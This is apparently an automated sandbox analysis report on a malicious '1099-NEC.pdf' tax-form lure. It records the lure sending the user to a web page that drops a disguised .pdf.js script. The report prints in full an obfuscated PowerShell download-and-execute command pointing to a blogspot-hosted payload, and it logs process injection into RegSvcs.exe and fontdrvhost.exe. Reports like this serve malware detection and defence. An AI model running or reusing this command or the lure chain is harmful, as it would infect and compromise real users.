Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49679 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49673
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 3.125.36.175:443 -> 192.168.2.16:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.229:443 -> 192.168.2.16:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.18.31.249:443 -> 192.168.2.16:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.18.31.249:443 -> 192.168.2.16:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.16.196:443 -> 192.168.2.16:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.223.19.158:443 -> 192.168.2.16:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.223.19.158:443 -> 192.168.2.16:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.129.229:443 -> 192.168.2.16:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.16:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.129.229:443 -> 192.168.2.16:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.245.46.7:443 -> 192.168.2.16:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.245.46.7:443 -> 192.168.2.16:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.245.46.7:443 -> 192.168.2.16:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.245.46.7:443 -> 192.168.2.16:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.245.46.7:443 -> 192.168.2.16:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.223.19.158:443 -> 192.168.2.16:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.223.19.158:443 -> 192.168.2.16:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.16:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.16:49762 version: TLS 1.2

Source: fontdrvhost.exe, 00000021.00000003.1790129763.0000000004CD0000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: DirectInput8Create

memstr_484d7418-6

Source: fontdrvhost.exe, 00000021.00000003.1790129763.0000000004CD0000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_c44d81a6-a

Source: Yara match	File source: 33.3.fontdrvhost.exe.4cd0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000021.00000003.1790129763.0000000004CD0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fontdrvhost.exe PID: 2476, type: MEMORYSTR

System Summary

Blob-based file download detected

Source: C:\Users\user\Downloads\1099-NEC.pdf.js

File download: blob:https://tax1099.netlify.app/950f7482-a13e-4ccf-8a8a-17e2059a5e03

Downloads suspicious files via Chrome

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File dump: C:\Users\user\Downloads\1099-NEC.pdf......................................js (copy)

Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_05B92134 NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,	19_2_05B92134
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_0588B28B GetCurrentProcess,NtQueryInformationProcess,	19_2_0588B28B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_0588519A NtQueryInformationProcess,	19_2_0588519A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_058854D6 NtQuerySystemInformation,malloc,NtQuerySystemInformation,GetCurrentProcess,GetCurrentProcess,memset,RtlGetVersion,GetCurrentProcess,OpenProcess,CloseHandle,lstrcmpiW,OpenProcess,CloseHandle,free,	19_2_058854D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_058877F1 GetProcAddress,NtQuerySystemInformation,malloc,NtQuerySystemInformation,GetCurrentProcess,OpenProcess,GetProcessImageFileNameW,K32GetProcessImageFileNameW,CloseHandle,free,	19_2_058877F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_05887486 IsBadReadPtr,malloc,GetCurrentProcess,NtUnmapViewOfSection,VirtualAlloc,GetLastError,NtSetInformationFile,Sleep,free,NtClose,	19_2_05887486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_05888A20 NtQueryInformationProcess,	19_2_05888A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_0588756C GetModuleFileNameW,RtlInitUnicodeString,NtOpenFile,	19_2_0588756C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_056E77F1 GetProcAddress,NtQuerySystemInformation,malloc,NtQuerySystemInformation,GetCurrentProcess,OpenProcess,GetProcessImageFileNameW,K32GetProcessImageFileNameW,CloseHandle,free,	20_2_056E77F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_056E519A NtQueryInformationProcess,	20_2_056E519A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_056E54D6 NtQuerySystemInformation,malloc,NtQuerySystemInformation,GetCurrentProcess,GetCurrentProcess,memset,RtlGetVersion,GetCurrentProcess,OpenProcess,CloseHandle,lstrcmpiW,OpenProcess,CloseHandle,free,	20_2_056E54D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_056EB28B GetCurrentProcess,NtQueryInformationProcess,	20_2_056EB28B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_056E756C GetModuleFileNameW,RtlInitUnicodeString,NtOpenFile,	20_2_056E756C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_056E8A20 NtQueryInformationProcess,	20_2_056E8A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_056E7486 IsBadReadPtr,malloc,GetCurrentProcess,NtUnmapViewOfSection,VirtualAlloc,GetLastError,NtSetInformationFile,Sleep,free,NtClose,	20_2_056E7486
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 33_3_04FDA2E4 NtQueryValueKey,	33_3_04FDA2E4
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 33_3_04EF8344 NtOpenKey,NtClose,	33_3_04EF8344
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 33_2_02BC519A NtQueryInformationProcess,	33_2_02BC519A
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 33_2_02BC77F1 NtQuerySystemInformation,NtQuerySystemInformation,K32GetProcessImageFileNameW,	33_2_02BC77F1
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 33_2_02BC54D6 NtQuerySystemInformation,NtQuerySystemInformation,RtlGetVersion,CloseHandle,	33_2_02BC54D6
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 33_2_02BC8A20 NtQueryInformationProcess,	33_2_02BC8A20
Source: C:\Windows\System32\fontdrvhost.exe	Code function: 37_2_0000025AD4151CF4 NtAcceptConnectPort,CloseHandle,	37_2_0000025AD4151CF4
Source: C:\Windows\System32\fontdrvhost.exe	Code function: 37_2_0000025AD4151AA4 NtAcceptConnectPort,NtAcceptConnectPort,	37_2_0000025AD4151AA4
Source: C:\Windows\System32\fontdrvhost.exe	Code function: 37_2_0000025AD41515C0 NtAcceptConnectPort,	37_2_0000025AD41515C0
Source: C:\Windows\System32\fontdrvhost.exe	Code function: 37_2_0000025AD4150AC8 NtAcceptConnectPort,NtAcceptConnectPort,	37_2_0000025AD4150AC8

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\scoped_dir7296_1752791875

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\scoped_dir7296_1752791875

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_01620C00	19_2_01620C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_01620860	19_2_01620860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_01620870	19_2_01620870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_01620805	19_2_01620805
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_01620BF0	19_2_01620BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_05B997EE	19_2_05B997EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_05B9873B	19_2_05B9873B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_05B9B432	19_2_05B9B432
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_05888FA8	19_2_05888FA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_0588440E	19_2_0588440E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_05883000	19_2_05883000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_0588AD4F	19_2_0588AD4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_06575540	19_2_06575540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_02D80C00	20_2_02D80C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_02D80BFF	20_2_02D80BFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_02D80870	20_2_02D80870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_02D8086F	20_2_02D8086F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_056EAD4F	20_2_056EAD4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_056E8FA8	20_2_056E8FA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_056E440E	20_2_056E440E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_056E3000	20_2_056E3000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_06505540	20_2_06505540
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 33_3_04EF5CA0	33_3_04EF5CA0
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 33_3_04FB507C	33_3_04FB507C
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 33_3_04EC2980	33_3_04EC2980
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 33_3_04EFA52C	33_3_04EFA52C
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 33_3_04EEFAF0	33_3_04EEFAF0
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 33_3_04EFC2D4	33_3_04EFC2D4
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 33_3_04EF4EA0	33_3_04EF4EA0
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 33_3_04F0AE70	33_3_04F0AE70
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 33_3_04F1AA00	33_3_04F1AA00
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 33_3_04FCBFE8	33_3_04FCBFE8
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 33_3_04FC7FE4	33_3_04FC7FE4
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 33_3_04FB6BD8	33_3_04FB6BD8
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 33_3_04EFE774	33_3_04EFE774
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 33_3_04FBA764	33_3_04FBA764
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 33_3_04FBAF00	33_3_04FBAF00
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 33_2_02BC440E	33_2_02BC440E
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 33_2_02BC8FA8	33_2_02BC8FA8
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 33_2_02BC3000	33_2_02BC3000
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 33_2_02BCAD4F	33_2_02BCAD4F
Source: C:\Windows\System32\fontdrvhost.exe	Code function: 37_2_0000025AD4150C70	37_2_0000025AD4150C70

Source: WER4C5D.tmp.xml.27.dr	OLE indicator, VBA macros: true
Source: WER4C4E.tmp.xml.28.dr	OLE indicator, VBA macros: true
Source: WER4C6D.tmp.xml.29.dr	OLE indicator, VBA macros: true
Source: WER4CDB.tmp.xml.30.dr	OLE indicator, VBA macros: true
Source: WER883E.tmp.xml.39.dr	OLE indicator, VBA macros: true

Source: WER4C5D.tmp.xml.27.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: WER4C4E.tmp.xml.28.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: WER4C6D.tmp.xml.29.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: WER4CDB.tmp.xml.30.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: WER883E.tmp.xml.39.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Windows\SysWOW64\fontdrvhost.exe

Code function: String function: 04F109B0 appears 55 times

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 936

Source: 17.2.powershell.exe.23ab7ef0000.0.raw.unpack, W3mIAMad8mK4ZyYb8CQ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 17.2.powershell.exe.23ab7ef0000.0.raw.unpack, W3mIAMad8mK4ZyYb8CQ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 17.2.powershell.exe.23ac8ff6158.2.raw.unpack, W3mIAMad8mK4ZyYb8CQ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 17.2.powershell.exe.23ac8ff6158.2.raw.unpack, W3mIAMad8mK4ZyYb8CQ.cs	Cryptographic APIs: 'CreateDecryptor'

Source: RegSvcs.exe, 00000014.00000002.1790344128.00000000056E3000.00000040.00001000.00020000.00000000.sdmp

Binary or memory string: .slnPt8q>|D

Source: classification engine

Classification label: mal100.troj.expl.evad.winPDF@72/124@29/16

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7072

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-d62aa157-c35a-233399-159d37406db3}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6128

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

File created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-03-17 13-52-19-510.log

Jump to behavior

Source: C:\Windows\SysWOW64\fontdrvhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\fontdrvhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: 1099-NEC.pdf

ReversingLabs: Detection: 13%

Source: unknown	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\1099-NEC.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1592 --field-trial-handle=1556,i,12716373814358718302,18053842497517291753,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://tax1099.netlify.app/#1099-NEC.pdf
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1916,i,6931622229401212323,17754570736813438004,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2064 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\1099-NEC.pdf .js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 936
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 792
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 920
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 764
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Process created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: C:\Windows\System32\fontdrvhost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6128 -s 144
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://tax1099.netlify.app/#1099-NEC.pdf	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1592 --field-trial-handle=1556,i,12716373814358718302,18053842497517291753,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
